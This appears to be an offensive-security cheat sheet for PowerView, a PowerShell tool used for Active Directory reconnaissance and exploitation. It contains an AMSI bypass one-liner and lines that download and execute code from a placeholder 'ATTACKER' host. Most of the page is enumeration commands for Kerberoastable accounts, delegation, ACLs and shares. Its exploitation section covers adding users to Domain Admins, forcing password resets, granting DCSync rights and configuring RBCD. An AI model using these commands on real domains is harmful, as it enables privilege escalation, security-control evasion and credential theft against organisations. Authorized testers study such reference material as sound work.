โ† All cheat sheets

POWERVIEW

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

PowerView is a PowerShell tool for Active Directory enumeration.
Part of PowerSploit, essential for AD reconnaissance and exploitation.

LOADING#


    

FROM DISK#

Import-Module .\PowerView.ps1
. .\PowerView.ps1

FROM URL#

IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')

AMSI BYPASS FIRST#

# Bypass AMSI then load
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/PowerView.ps1')

DOMAIN ENUMERATION#


    

DOMAIN INFO#

Get-Domain                          # Current domain
Get-Domain -Domain other.local      # Specific domain
Get-DomainSID                       # Domain SID
Get-DomainPolicy                    # Domain policy
(Get-DomainPolicy)."SystemAccess"   # Password policy
Get-DomainController                # Domain controllers

USERS#

Get-DomainUser                      # All users
Get-DomainUser -Identity admin      # Specific user
Get-DomainUser -SPN                 # Users with SPN (Kerberoastable)
Get-DomainUser -PreAuthNotRequired  # AS-REP Roastable
Get-DomainUser -AdminCount          # Privileged users
Get-DomainUser -TrustedToAuth       # Constrained delegation

# User properties
Get-DomainUser -Identity admin -Properties *
Get-DomainUser | Select samaccountname,description

# Search in description
Get-DomainUser -LDAPFilter "(description=*pass*)" | Select samaccountname,description

GROUPS#

Get-DomainGroup                     # All groups
Get-DomainGroup -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins"
Get-DomainGroupMember -Identity "Domain Admins" -Recurse

# Interesting groups
Get-DomainGroup *admin*
Get-DomainGroup -AdminCount

# User's groups
Get-DomainGroup -UserName "username"

COMPUTERS#

Get-DomainComputer                  # All computers
Get-DomainComputer -Ping            # Only online
Get-DomainComputer -OperatingSystem "*Server*"
Get-DomainComputer -Unconstrained   # Unconstrained delegation
Get-DomainComputer -TrustedToAuth   # Constrained delegation

# Computer properties
Get-DomainComputer -Identity DC01 -Properties *

OUs#

Get-DomainOU                        # All OUs
Get-DomainOU -Identity "Servers"
Get-DomainOU | Select name,distinguishedname

# Computers in OU
Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=local"

GPOs#

Get-DomainGPO                       # All GPOs
Get-DomainGPO -Identity "Default Domain Policy"
Get-DomainGPO -ComputerIdentity DC01  # GPOs applied to computer

# GPO local groups
Get-DomainGPOLocalGroup
Get-DomainGPOUserLocalGroupMapping -Identity admin

ACL ENUMERATION#


    

BASIC ACL#

Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Specific rights
Get-DomainObjectAcl -Identity admin -ResolveGUIDs | ? {$_.ActiveDirectoryRights -match "GenericAll|Write|Self"}

# Find interesting ACEs for user
Find-InterestingDomainAcl -ResolveGUIDs | ? {$_.IdentityReferenceName -match "username"}

COMMON ABUSABLE RIGHTS#

# GenericAll - Full control
# GenericWrite - Modify attributes
# WriteOwner - Change owner
# WriteDACL - Modify ACL
# Self - Add self to group
# ForceChangePassword - Reset password
# AllExtendedRights - All extended rights
# AddMembers - Add members to group

DCSync RIGHTS#

# Check for DCSync rights
Get-DomainObjectAcl -SearchBase "DC=domain,DC=local" -ResolveGUIDs | ? {
    ($_.ActiveDirectoryRights -match "GenericAll") -or
    ($_.ObjectAceType -match "DS-Replication-Get-Changes")
}

FIND MISCONFIGURATIONS#

# Users with SPN (Kerberoastable)
Get-DomainUser -SPN | Select samaccountname,serviceprincipalname

# AS-REP Roastable
Get-DomainUser -PreAuthNotRequired | Select samaccountname

# Unconstrained Delegation
Get-DomainComputer -Unconstrained
Get-DomainUser -AllowDelegation -AdminCount

# Constrained Delegation
Get-DomainComputer -TrustedToAuth | Select dnshostname,msds-allowedtodelegateto
Get-DomainUser -TrustedToAuth | Select samaccountname,msds-allowedtodelegateto

# LAPS
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | ? {$_.ObjectAceType -match "ms-Mcs-AdmPwd"}

# AdminSDHolder abuse
Get-DomainObjectAcl -SearchBase "CN=AdminSDHolder,CN=System,DC=domain,DC=local" -ResolveGUIDs

LOCAL ENUMERATION#

# Local admins on remote computer
Get-NetLocalGroup -ComputerName target
Get-NetLocalGroupMember -ComputerName target -GroupName "Administrators"

# Logged on users
Get-NetLoggedon -ComputerName target

# Sessions
Get-NetSession -ComputerName target

# Shares
Get-NetShare -ComputerName target

FIND WHERE USER HAS ACCESS#

# Where current user is local admin
Find-LocalAdminAccess

# Where user has session
Find-DomainUserLocation

# Where group members have session
Find-DomainUserLocation -GroupName "Domain Admins"

# Where specific user has session
Find-DomainUserLocation -UserIdentity admin

FOREST/TRUST ENUMERATION#

# Forest info
Get-Forest
Get-ForestDomain

# Trusts
Get-DomainTrust
Get-DomainTrust -Domain other.local
Get-ForestTrust

# Foreign group members
Get-DomainForeignGroupMember

# Foreign user membership
Get-DomainForeignUser

FILE SHARES#

# Find shares
Find-DomainShare

# Writable shares
Find-DomainShare -CheckShareAccess

# Find interesting files
Find-InterestingDomainShareFile
Find-InterestingDomainShareFile -Include "*.config","*.ps1","*password*"

EXPLOITATION HELPERS#


    

SET SPN (Kerberoast Target)#

# If you have write access to user
Set-DomainObject -Identity targetuser -Set @{serviceprincipalname='fake/spn'}
Get-DomainSPNTicket -SPN "fake/spn"

ADD TO GROUP#

# If you have AddMembers right
Add-DomainGroupMember -Identity "Domain Admins" -Members "controlled_user"

MODIFY USER#

# Force password reset (if ForceChangePassword)
Set-DomainUserPassword -Identity target -AccountPassword (ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# Disable pre-auth (if GenericAll/Write)
Set-DomainObject -Identity target -XOR @{useraccountcontrol=4194304}

MODIFY ACL#

# If WriteDACL
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity controlled_user -Rights All

DCSync#

# If replication rights
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity user -Rights DCSync

RBCD#

# Set RBCD on target
Set-DomainObject -Identity TARGET$ -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SD}

# Build security descriptor
$sid = Get-DomainComputer ATTACKER$ -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$sid)"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)

SHARPVIEW#

# C# version for use without PowerShell
# Download: https://github.com/tevora-threat/SharpView

SharpView.exe Get-DomainUser -Identity admin
SharpView.exe Get-DomainGroup -Identity "Domain Admins"
SharpView.exe Find-LocalAdminAccess

QUICK REFERENCE#

Get-Domain                          # Domain info
Get-DomainUser -SPN                 # Kerberoastable
Get-DomainUser -PreAuthNotRequired  # AS-REP roastable
Get-DomainComputer -Unconstrained   # Unconstrained delegation
Get-DomainGroupMember "Domain Admins" -Recurse  # DA members
Find-LocalAdminAccess               # Where user is admin
Find-DomainUserLocation            # Where users logged in
Get-DomainObjectAcl -ResolveGUIDs  # ACL enumeration
Get-DomainTrust                     # Domain trusts
Find-InterestingDomainShareFile    # Interesting files